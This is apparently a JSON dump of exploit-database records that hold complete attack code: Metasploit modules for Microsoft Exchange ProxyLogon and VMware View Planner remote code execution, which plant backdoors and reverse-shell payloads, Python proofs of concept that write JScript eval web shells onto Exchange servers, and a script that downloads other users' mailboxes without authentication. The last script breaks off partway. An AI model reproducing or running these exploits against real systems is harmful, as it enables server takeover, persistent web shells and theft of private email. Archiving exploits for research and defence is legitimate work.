datastore['UseAlternatePath'] \nremote_path = \"#{datastore['IISBasePath'].split(':')[1]}\\\\#{datastore['IISWritePath']}\" \nremote_path = \"\\\\\\\\127.0.0.1\\\\#{datastore['IISBasePath'].split(':')[0]}$#{remote_path}\\\\#{remote_file}\" \nelse \nremote_path = \"#{datastore['ExchangeBasePath'].split(':')[1]}\\\\FrontEnd\\\\HttpProxy\\\\#{datastore['ExchangeWritePath']}\" \nremote_path = \"\\\\\\\\127.0.0.1\\\\#{datastore['ExchangeBasePath'].split(':')[0]}$#{remote_path}\\\\#{remote_file}\" \nend \n \ndata = { \nidentity: { \n__type: 'Identity:ECP', \nDisplayName: (exploit_info[4][0]).to_s, \nRawIdentity: (exploit_info[4][1]).to_s \n}, \nproperties: { \nParameters: { \n__type: 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel', \nFilePathName: remote_path.to_s \n} \n} \n}.to_json \n \nresponse = send_http( \n'POST', \n\"Admin@#{exploit_info[0]}:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=#{exploit_info[3]}&a=~#{random_ssrf_id}\", \ndata: data, \ncookie: exploit_info[2], \nctype: 'application/json; charset=utf-8', \nheaders: { \n'msExchLogonMailbox' => patch_sid(exploit_info[1]), \n'msExchTargetMailbox' => patch_sid(exploit_info[1]), \n'X-vDirObjectId' => (exploit_info[4][1]).to_s \n} \n) \nreturn '' if response.code != 200 \n \nremote_file \nend \n \ndef exploit \n@proto = (ssl ? 'https' : 'http') \n@random_uri = normalize_uri('ecp', \"#{rand_text_alpha(1..3)}.js\") \n \nprint_status(message('Attempt to exploit for CVE-2021-26855')) \nexploit_info = run_cve_2021_26855 \n \nprint_status(message('Attempt to exploit for CVE-2021-27065')) \nshell_info = run_cve_2021_27065(exploit_info) \n \n@random_inputname = shell_info[0] \n@random_filename = shell_info[1] \n \nprint_good(\"Yeeting #{datastore['PAYLOAD']} payload at #{peer}\") \nif datastore['UseAlternatePath'] \nremote_file = \"#{datastore['IISBasePath']}\\\\#{datastore['IISWritePath']}\\\\#{@random_filename}\" \nelse \nremote_file = \"#{datastore['ExchangeBasePath']}\\\\FrontEnd\\\\HttpProxy\\\\#{datastore['ExchangeWritePath']}\\\\#{@random_filename}\" \nend \nregister_files_for_cleanup(remote_file) \n \n# trigger powa! \ncase target['Type'] \nwhen :windows_command \nvprint_status(\"Generated payload: #{payload.encoded}\") \n \nif !cmd_windows_generic? \nexecute_command(payload.encoded) \nelse \nresponse = execute_command(\"cmd /c #{payload.encoded}\") \n \nprint_warning('Dumping command output in response') \noutput = response.body.split('Name :')[0] \nif output.empty? \nprint_error('Empty response, no command output') \nreturn \nend \nprint_line(output) \nend \nwhen :windows_dropper \nexecute_command(generate_cmdstager(concat_operator: ';').join) \nwhen :windows_powershell \ncmd = cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true) \nexecute_command(cmd) \nend \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/161938/exchange_proxylogon_rce.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-19T17:09:26", "description": "", "cvss3": {}, "published": "2021-03-19T00:00:00", "type": "packetstorm", "title": "VMware View Planner 4.6 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21978"], "modified": "2021-03-19T00:00:00", "id": "PACKETSTORM:161879", "href": "https://packetstormsecurity.com/files/161879/VMware-View-Planner-4.6-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'VMware View Planner Unauthenticated Log File Upload RCE', \n'Description' => %q{ \nThis module exploits an unauthenticated log file upload within the \nlog_upload_wsgi.py file of VMWare View Planner 4.6 prior to 4.6 \nSecurity Patch 1. \n \nSuccessful exploitation will result in RCE as the apache user inside \nthe appacheServer Docker container. \n}, \n'Author' => [ \n'Mikhail Klyuchnikov', # Discovery \n'wvu', # Analysis and PoC \n'Grant Willcox' # Metasploit Module \n], \n'References' => [ \n['CVE', '2021-21978'], \n['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0003.html'], \n['URL', 'https://attackerkb.com/assessments/fc456e03-adf5-409a-955a-8a4fb7e79ece'] # wvu's PoC \n], \n'DisclosureDate' => '2021-03-02', # Vendor advisory \n'License' => MSF_LICENSE, \n'Privileged' => false, \n'Platform' => 'python', \n'Targets' => [ \n[ \n'VMware View Planner 4.6.0', \n{ \n'Arch' => ARCH_PYTHON, \n'Type' => :linux_command, \n'DefaultOptions' => { \n'PAYLOAD' => 'python/meterpreter/reverse_tcp' \n} \n} \n], \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOpt::RPORT(443), \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'wsgi_log_upload', 'log_upload_wsgi.py') \n) \n \nunless res \nreturn CheckCode::Unknown('Target did not respond to check.') \nend \n \nunless res.code == 200 && !res.body.empty? \nreturn CheckCode::Safe('log_upload_wsgi.py file not found at the expected location.') \nend \n \n@original_content = res.body # If the server responded with the contents of log_upload_wsgi.py, lets save this for later restoration. \n \nif res.body&.include?('import hashlib') && res.body&.include?('if hashlib.sha256(password.value.encode(\"utf8\")).hexdigest()==secret_key:') \nreturn CheckCode::Safe(\"Target's log_upload_wsgi.py file has been patched.\") \nend \n \nCheckCode::Appears('Vulnerable log_upload_wsgi.py file identified!') \nend \n \n# We need to upload a file twice: once for uploading the backdoor, and once for restoring the original file. \n# As the code for both is the same, minus the content of the file, this is a generic function to handle that. \ndef upload_file(content) \nmime = Rex::MIME::Message.new \nmime.add_part(content, 'application/octet-stream', nil, \"form-data; name=\\\"logfile\\\"; filename=\\\"#{Rex::Text.rand_text_alpha(20)}\\\"\") \nmime.add_part('{\"itrLogPath\":\"/etc/httpd/html/wsgi_log_upload\",\"logFileType\":\"log_upload_wsgi.py\"}', nil, nil, 'form-data; name=\"logMetaData\"') \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, 'logupload'), \n'ctype' => \"multipart/form-data; boundary=#{mime.bound}\", \n'data' => mime.to_s \n) \nunless res.to_s.include?('File uploaded successfully.') \nfail_with(Failure::UnexpectedReply, \"Target indicated that the file wasn't uploaded successfully!\") \nend \nend \n \ndef exploit \n# Here we want to grab our template file, taken from a clean install but \n# with a backdoor section added to it, and then fill in the PAYLOAD placeholder \n# with the payload we want to execute. \ndata_dir = File.join(Msf::Config.data_directory, 'exploits', shortname) \nfile_content = File.read(File.join(data_dir, 'log_upload_wsgi.py')) \n \npayload.encoded.gsub!(/\"/, '\\\\\"') \nfile_content['PAYLOAD'] = payload.encoded \n \n# Now that things are primed, upload the file to the target. \nprint_status('Uploading backdoor to system via the arbitrary file upload vulnerability!') \nupload_file(file_content) \nprint_good('Backdoor uploaded!') \n \n# Use the OPTIONS request to trigger the backdoor. Technically this \n# could be any other method including invalid ones like BACKDOOR, but for \n# the purposes of stealth lets use a legitimate one. \nprint_status('Sending request to execute the backdoor!') \nsend_request_cgi( \n'method' => 'OPTIONS', \n'uri' => normalize_uri(target_uri.path, 'logupload') \n) \nensure \n# At this point we should have our shell after waiting a few seconds, \n# so lets now restore the original file so we don't leave anything behind. \nprint_status('Reuploading the original code to remove the backdoor!') \nupload_file(@original_content) \nprint_good('Original file restored, enjoy the shell!') \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/161879/vmware_view_planner_4_6_uploadlog_rce.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-15T21:46:57", "description": "", "cvss3": {}, "published": "2021-03-11T00:00:00", "type": "packetstorm", "title": "Microsoft Exchange Proxylogon SSRF Proof Of Concept", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26855"], "modified": "2021-03-11T00:00:00", "id": "PACKETSTORM:161806", "href": "https://packetstormsecurity.com/files/161806/Microsoft-Exchange-Proxylogon-SSRF-Proof-Of-Concept.html", "sourceData": "`# Original Author: testanull https://github.com/testanull https://twitter.com/testanull \n# PoC of proxylogon chain SSRF(CVE-2021-26855) to write file \n# Original \"Archive\" https://web.archive.org/web/20210310164403/https://gist.github.com/testanull/fabd8eeb46f120c4b15f8793617ca7d1 \n \nimport requests \nfrom urllib3.exceptions import InsecureRequestWarning \nimport random \nimport string \nimport sys \n \n \ndef id_generator(size=6, chars=string.ascii_lowercase + string.digits): \nreturn ''.join(random.choice(chars) for _ in range(size)) \n \nif len(sys.argv) < 2: \nprint(\"Usage: python PoC.py <target> <email>\") \nprint(\"Example: python PoC.py mail.evil.corp haxor@evil.corp\") \nexit() \nrequests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) \ntarget = sys.argv[1] \nemail = sys.argv[2] \nrandom_name = id_generator(3) + \".js\" \nuser_agent = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36\" \n \nshell_path = \"Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth\\\\ahihi.aspx\" \nshell_absolute_path = \"\\\\\\\\127.0.0.1\\\\c$\\\\%s\" % shell_path \n \nshell_content = '<script language=\"JScript\" runat=\"server\"> function Page_Load(){/**/eval(Request[\"exec_code\"],\"unsafe\");}</script>' \nlegacyDnPatchByte = \"68747470733a2f2f696d6775722e636f6d2f612f7a54646e5378670a0a0a0a0a0a0a0a\" \nautoDiscoverBody = \"\"\"<Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\"> \n<Request> \n<EMailAddress>%s</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema> \n</Request> \n</Autodiscover> \n\"\"\" % email \n \nprint(\"Attacking target \" + target) \nprint(\"=============================\") \nprint(legacyDnPatchByte.decode('hex')) \nFQDN = \"EXCHANGE\" \nct = requests.get(\"https://%s/ecp/%s\" % (target, random_name), headers={\"Cookie\": \"X-BEResource=localhost~1942062522\", \n\"User-Agent\": user_agent}, \nverify=False) \nif \"X-CalculatedBETarget\" in ct.headers and \"X-FEServer\" in ct.headers: \nFQDN = ct.headers[\"X-FEServer\"] \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=%s/autodiscover/autodiscover.xml?a=~1942062522;\" % FQDN, \n\"Content-Type\": \"text/xml\", \n\"User-Agent\": user_agent}, \ndata=autoDiscoverBody, \nverify=False \n) \nif ct.status_code != 200: \nprint(\"Autodiscover Error!\") \nexit() \nif \"<LegacyDN>\" not in ct.content: \nprint(\"Can not get LegacyDN!\") \nexit() \n \nlegacyDn = ct.content.split(\"<LegacyDN>\")[1].split(\"</LegacyDN>\")[0] \nprint(\"Got DN: \" + legacyDn) \n \nmapi_body = legacyDn + \"\\x00\\x00\\x00\\x00\\x00\\xe4\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00\" \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Admin@%s:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&a=~1942062522;\" % FQDN, \n\"Content-Type\": \"application/mapi-http\", \n\"User-Agent\": user_agent \n}, \ndata=mapi_body, \nverify=False \n) \nif ct.status_code != 200 or \"act as owner of a UserMailbox\" not in ct.content: \nprint(\"Mapi Error!\") \nexit() \n \nsid = ct.content.split(\"with SID \")[1].split(\" and MasterAccountSid\")[0] \n \nprint(\"Got SID: \" + sid) \n \nproxyLogon_request = \"\"\"<r at=\"Negotiate\" ln=\"john\"><s>%s</s><s a=\"7\" t=\"1\">S-1-1-0</s><s a=\"7\" t=\"1\">S-1-5-2</s><s a=\"7\" t=\"1\">S-1-5-11</s><s a=\"7\" t=\"1\">S-1-5-15</s><s a=\"3221225479\" t=\"1\">S-1-5-5-0-6948923</s></r> \n\"\"\" % sid \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Admin@%s:444/ecp/proxyLogon.ecp?a=~1942062522;\" % FQDN, \n\"Content-Type\": \"text/xml\", \n\"User-Agent\": user_agent \n}, \ndata=proxyLogon_request, \nverify=False \n) \nif ct.status_code != 241 or not \"set-cookie\" in ct.headers: \nprint(\"Proxylogon Error!\") \nexit() \n \nsess_id = ct.headers['set-cookie'].split(\"ASP.NET_SessionId=\")[1].split(\";\")[0] \n \nmsExchEcpCanary = ct.headers['set-cookie'].split(\"msExchEcpCanary=\")[1].split(\";\")[0] \nprint(\"Got session id: \" + sess_id) \nprint(\"Got canary: \" + msExchEcpCanary) \n \nct = requests.get(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Admin@%s:444/ecp/about.aspx?a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % ( \nFQDN, sess_id, msExchEcpCanary), \n\"User-Agent\": user_agent \n}, \nverify=False \n) \nif ct.status_code != 200: \nprint(\"Wrong canary!\") \nprint(\"Sometime we can skip this ...\") \nrbacRole = ct.content.split(\"RBAC roles:</span> <span class='diagTxt'>\")[1].split(\"</span>\")[0] \n# print \"Got rbacRole: \"+ rbacRole \n \nprint(\"=========== It means good to go!!!====\") \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Admin@%s:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % ( \nFQDN, msExchEcpCanary, sess_id, msExchEcpCanary), \n\"Content-Type\": \"application/json; charset=utf-8\", \n\"User-Agent\": user_agent \n \n}, \njson={\"filter\": { \n\"Parameters\": {\"__type\": \"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel\", \n\"SelectedView\": \"\", \"SelectedVDirType\": \"All\"}}, \"sort\": {}}, \nverify=False \n) \nif ct.status_code != 200: \nprint(\"GetOAB Error!\") \nexit() \noabId = ct.content.split('\"RawIdentity\":\"')[1].split('\"')[0] \nprint(\"Got OAB id: \" + oabId) \n \noab_json = {\"identity\": {\"__type\": \"Identity:ECP\", \"DisplayName\": \"OAB (Default Web Site)\", \"RawIdentity\": oabId}, \n\"properties\": { \n\"Parameters\": {\"__type\": \"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel\", \n\"ExternalUrl\": \"http://ffff/#%s\" % shell_content}}} \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Admin@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % ( \nFQDN, msExchEcpCanary, sess_id, msExchEcpCanary), \n\"Content-Type\": \"application/json; charset=utf-8\", \n\"User-Agent\": user_agent \n}, \njson=oab_json, \nverify=False \n) \nif ct.status_code != 200: \nprint(\"Set external url Error!\") \nexit() \n \nreset_oab_body = {\"identity\": {\"__type\": \"Identity:ECP\", \"DisplayName\": \"OAB (Default Web Site)\", \"RawIdentity\": oabId}, \n\"properties\": { \n\"Parameters\": {\"__type\": \"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel\", \n\"FilePathName\": shell_absolute_path}}} \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Admin@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % ( \nFQDN, msExchEcpCanary, sess_id, msExchEcpCanary), \n\"Content-Type\": \"application/json; charset=utf-8\", \n\"User-Agent\": user_agent \n}, \njson=reset_oab_body, \nverify=False \n) \n \nif ct.status_code != 200: \nprint(\"Write Shell Error!\") \nexit() \n \nprint(\"Successful!\") \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/161806/PoC_proxyLogon.py.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-05-18T15:56:31", "description": "", "cvss3": {}, "published": "2021-05-18T00:00:00", "type": "packetstorm", "title": "Microsoft Exchange 2019 Unauthenticated Email Download", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26855"], "modified": "2021-05-18T00:00:00", "id": "PACKETSTORM:162610", "href": "https://packetstormsecurity.com/files/162610/Microsoft-Exchange-2019-Unauthenticated-Email-Download.html", "sourceData": "`# Exploit Title: Microsoft Exchange 2019 - Unauthenticated Email Download \n# Date: 03-11-2021 \n# Exploit Author: Gonzalo Villegas a.k.a Cl34r \n# Vendor Homepage: https://www.microsoft.com/ \n# Version: OWA Exchange 2013 - 2019 \n# Tested on: OWA 2016 \n# CVE : CVE-2021-26855 \n# Details: checking users mailboxes and automated downloads of emails \n \nimport requests \nimport argparse \nimport time \n \nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning \nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning) \n \n__proxies__ = {\"http\": \"http://127.0.0.1:8080\", \n\"https\": \"https://127.0.0.1:8080\"} # for debug on proxy \n \n \n# needs to specifies mailbox, will return folder Id if account exists \npayload_get_folder_id = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \nxmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \nxmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \nxmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soap:Body> \n<m:GetFolder> \n<m:FolderShape> \n<t:BaseShape>AllProperties</t:BaseShape> \n</m:FolderShape> \n<m:FolderIds> \n<t:DistinguishedFolderId Id=\"inbox\"> \n<t:Mailbox> \n<t:EmailAddress>{}</t:EmailAddress> \n</t:Mailbox> \n</t:DistinguishedFolderId> \n</m:FolderIds> \n</m:GetFolder> \n</soap:Body> \n</soap:Envelope> \n \n\"\"\" \n# needs to specifies Folder Id and ChangeKey, will return a list of messages Ids (emails) \npayload_get_items_id_folder = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \nxmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \nxmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \nxmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soap:Body> \n<m:FindItem Traversal=\"Shallow\"> \n<m:ItemShape> \n<BaseShape>AllProperties</BaseShape></m:ItemShape> \n<SortOrder/> \n<m:ParentFolderIds> \n<t:FolderId Id=\"{}\" ChangeKey=\"{}\"/> \n</m:ParentFolderIds> \n<QueryString/> \n</m:FindItem> \n</soap:Body> \n</soap:Envelope> \n\"\"\" \n \n# needs to specifies Id (message Id) and ChangeKey (of message too), will return an email from mailbox \npayload_get_mail = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \nxmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \nxmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \nxmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soap:Body> \n<GetItem xmlns=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \nxmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" Traversal=\"Shallow\"> \n<ItemShape> \n<t:BaseShape>Default</t:BaseShape> \n</ItemShape> \n<ItemIds> \n<t:ItemId Id=\"{}\" ChangeKey=\"{}\"/> \n</ItemIds> \n</GetItem> \n</soap:Body> \n</soap:Envelope> \n\"\"\" \n \n \ndef getFQDN(url): \nprint(\"[*] Getting FQDN from headers\") \nrs = requests.post(url + \"/owa/auth.owa\", verify=False, data=\"evildata\") \nif \"X-FEServer\" in rs.headers: \nreturn rs.headers[\"X-FEServer\"] \nelse: \nprint(\"[-] Can't get FQDN \") \nexit(0) \n \n \ndef extractEmail(url, uri, user, fqdn, content_folderid, path): \nheaders = {\"Cookie\": \"X-BEResource={}/EWS/Exchange.asmx?a=~1942062522\".format(fqdn), \n\"Content-Type\": \"text/xml\", \n\"User-Agent\": \"Mozilla pwner\"} \nfrom xml.etree import ElementTree as ET \ndom = ET.fromstring(content_folderid) \nfor p in dom.findall('.//{http://schemas.microsoft.com/exchange/services/2006/types}Folder'): \nid_folder = p[0].attrib.get(\"Id\") \nchange_key_folder = p[0].attrib.get(\"ChangeKey\") \ndata = payload_get_items_id_folder.format(id_folder, change_key_folder) \nrandom_uris = [\"auth.js\", \"favicon.ico\", \"ssq.js\", \"ey37sj.js\"] \nrs = requests.post(url + uri, data=data, headers=headers, verify=False) \nif \"ErrorAccessDenied\" in rs.text: \nprint(\"[*] Denied ;(.. retrying\") \nt_uri = uri.split(\"/\")[-1] \nfor ru in random_uris: \nprint(\"[*] Retrying with {}\".format(uri.replace(t_uri, ru))) \nrs = requests.post(url + uri.replace(t_uri, ru), data=data, headers=headers, verify=False) \nif \"NoError\" in rs.text: \nprint(\"[+] data found, dowloading email\") \nbreak \nprint(\"[+]Getting mails...\") \ndom_messages = ET.fromstring(rs.text) \nmessages = dom_messages.find('.//{http://schemas.microsoft.com/exchange/services/2006/types}Items') \nfor m in messages: \nid_message = m[0].attrib.get(\"Id\") \nchange_key_message = m[0].attrib.get(\"ChangeKey\") \ndata = payload_get_mail.format(id_message, change_key_message) \nrandom_uris = [\"auth.js\", \"favicon.ico\", \"ssq.js\", \"ey37sj.js\"] \nrs = requests.post(url + uri, data=data, headers=headers, verify=False) \nif \"ErrorAccessDenied\" in rs.text: \nprint(\"[*] Denied ;(.. retrying\") \nt_uri = uri.split(\"/\")[-1] \nfor ru in random_uris: \nprint(\"[*] Retrying with {}\".format(uri.replace(t_uri, ru))) \nrs = requests.post(url + uri.replace(t_uri, ru), data=data, headers=headers, verify=False) \nif \"NoError\" in rs.text: \nprint(\"[+] data found, downloading email\") \nbreak \n \ntry: \nf = open(path + \"/\" + user.replace(\"@\", \"_\").replace(\".\", \"_\")+\"_\"+change_key_message.replace(\"/\", \"\").replace(\"\\\\\", \"\")+\".xml\", 'w+') \nf.write(rs.text) \nf.close() \nexcept Exception as e: \nprint(\"[!] Can't write .xml file to path (email): \", e) \n \n \ndef checkURI(url, fqdn): \nheaders = {\"Cookie\": \"X-BEResource={}/EWS/Exchange.asmx?a=~1942062522\".format(fqdn), \n\"Content-Type\": \"text/xml\", \n\"User-Agent\": \"Mozilla hehe\"} \narr_uri = [\"//ecp/xxx.js\", \"/ecp/favicon.ico\", \"/ecp/auth.js\"] \nfor uri in arr_uri: \nrs = requests.post(url + uri, verify=False, data=payload_get_folder_id.format(\"thisisnotanvalidmail@pwn.local\"), \nheaders=headers) \n#print(rs.content) \nif rs.status_code == 200 and \"MessageText\" in rs.text: \nprint(\"[+] Valid URI:\", uri) \ncalculated_domain = rs.headers[\"X-CalculatedBETarget\"].split(\".\") \nif calculated_domain[-2] in (\"com\", \"gov\", \"gob\", \"edu\", \"org\"): \ncalculated_domain = calculated_domain[-3] + \".\" + calculated_domain[-2] + \".\" + calculated_domain[-1] \nelse: \ncalculated_domain = calculated_domain[-2] + \".\" + calculated_domain[-1] \nreturn uri, calculated_domain \n#time.sleep(1) \nprint(\"[-] No valid URI found ;(\") \nexit(0) \n \n \ndef checkEmailBoxes(url, uri, user, fqdn, path): \nheaders = {\"Cookie\": \"X-BEResource={}/EWS/Exchange.asmx?a=~1942062522\".format(fqdn), \n\"Content-Type\": \"text/xml\", \n\"User-Agent\": \"Mozilla hehe\"} \nrs = requests.post(url + uri, verify=False, data=payload_get_folder_id.format(user), \nheaders=headers) \n#time.sleep(1) \n#print(rs.content) \nif \"ResponseCode\" in rs.text and \"ErrorAccessDenied\" in rs.text: \nprint(\"[*] Valid Email: {} ...but not authenticated ;( maybe not vulnerable\".format(user)) \nif \"ResponseCode\" in rs.text and \"NoError\" in rs.text: \nprint(\"[+] Valid Email Found!: {}\".format(user)) \nextractEmail(url, uri, user, fqdn, rs.text, path) \nif \"ResponseCode\" in rs.text and \"ErrorNonExistentMailbox\" in rs.text: \nprint(\"[-] Not Valid Email: {}\".format(user)) \n \n \ndef main(): \n__URL__ = None \n__FQDN__ = None \n__mailbox_domain__ = None \n__path__ = None \nprint(\"[***** OhhWAA *****]\") \nparser = argparse.ArgumentParser(usage=\"Basic usage python %(prog)s -u <url> -l <users.txt> -p <path>\") \nparser.add_argument('-u', \"--url\", help=\"Url, provide schema and not final / (eg https://example.org)\", required=True) \nparser.add_argument('-l', \"--list\", help=\"Users mailbox list\", required=True) \nparser.add_argument(\"-p\", \"--path\", help=\"Path to write emails in xml format\", required=True) \nparser.add_argument('-f', \"--fqdn\", help=\"FQDN\", required=False, default=None) \nparser.add_argument(\"-d\", \"--domain\", help=\"Domain to check mailboxes (eg if .local dont work)\", required=False, default=None) \nargs = parser.parse_args() \n__URL__ = args.url \n__FQDN__ = args.fqdn \n__mailbox_domain__ = args.domain \n__list_users__ = args.list \n__valid_users__ = [] \n__path__ = args.path \nif not __FQDN__: \n__FQDN__ = getFQDN(__URL__) \nprint(\"[+] Got FQDN:\", __FQDN__) \n \nvalid_uri, calculated_domain = checkURI(__URL__, __FQDN__) \n \nif not __mailbox_domain__: \n__mailbox_domain__ = calculated_domain \n \nlist_users = open(__list_users__, \"r\") \nfor user in list_users: \ncheckEmailBoxes(__URL__, valid_uri, user.strip()+\"@\"+__mailbox_domain__, __FQDN__, __path__) \n \nprint(\"[!!!] FINISHED OhhWAA\") \n \n \nif __name__ == '__main__': \nmain() \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/162610/msexchange2019-disclose.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-18T14:17:14", "description": "", "cvss3": {}, "published": "2021-03-18T00:00:00", "type": "packetstorm", "title": "Microsoft Exchange 2019 SSRF / Arbitrary File Write ", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26855"], "modified": "2021-03-18T00:00:00", "id": "PACKETSTORM:161846", "href": "https://packetstormsecurity.com/files/161846/Microsoft-Exchange-2019-SSRF-Arbitrary-File-Write.html", "sourceData": "`import requests \nfrom urllib3.exceptions import InsecureRequestWarning \nimport random \nimport string \nimport sys \n \n \ndef id_generator(size=6, chars=string.ascii_lowercase + string.digits): \nreturn ''.join(random.choice(chars) for _ in range(size)) \n \nif len(sys.argv) < 2: \nprint(\"\u4f7f\u7528\u65b9\u5f0f: python PoC.py <target> <email>\") \nprint(\"\u4f7f\u7528\u65b9\u5f0f: python PoC.py mail.btwaf.cn test2@btwaf.cn\") \nexit() \n \nproxies = {\"http\": \"http://127.0.0.1:8080\", \"https\": \"http://127.0.0.1:8080\"} \nrequests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) \ntarget = sys.argv[1] \nemail = sys.argv[2] \nrandom_name = id_generator(4) + \".js\" \nuser_agent = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36\" \n \nshell_path = \"Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth\\\\test11.aspx\" \nshell_absolute_path = \"\\\\\\\\127.0.0.1\\\\c$\\\\%s\" % shell_path \n \n# webshell-\u9a6c\u5b50\u5185\u5bb9 \nshell_content = '<script language=\"JScript\" runat=\"server\"> function Page_Load(){/**/eval(Request[\"code\"],\"unsafe\");}</script>' \n \nautoDiscoverBody = \"\"\"<Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\"> \n<Request> \n<EMailAddress>%s</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema> \n</Request> \n</Autodiscover> \n\"\"\" % email \n \nprint(\"\u6b63\u5728\u83b7\u53d6Exchange Server \" + target+\"\u6743\u9650\") \nprint(\"=============================\") \nFQDN = \"EXCHANGE01\" \nct = requests.get(\"https://%s/ecp/%s\" % (target, random_name), headers={\"Cookie\": \"X-BEResource=localhost~1942062522\", \n\"User-Agent\": user_agent}, \nverify=False,proxies=proxies) \n \nif \"X-CalculatedBETarget\" in ct.headers and \"X-FEServer\" in ct.headers: \nFQDN = ct.headers[\"X-FEServer\"] \n 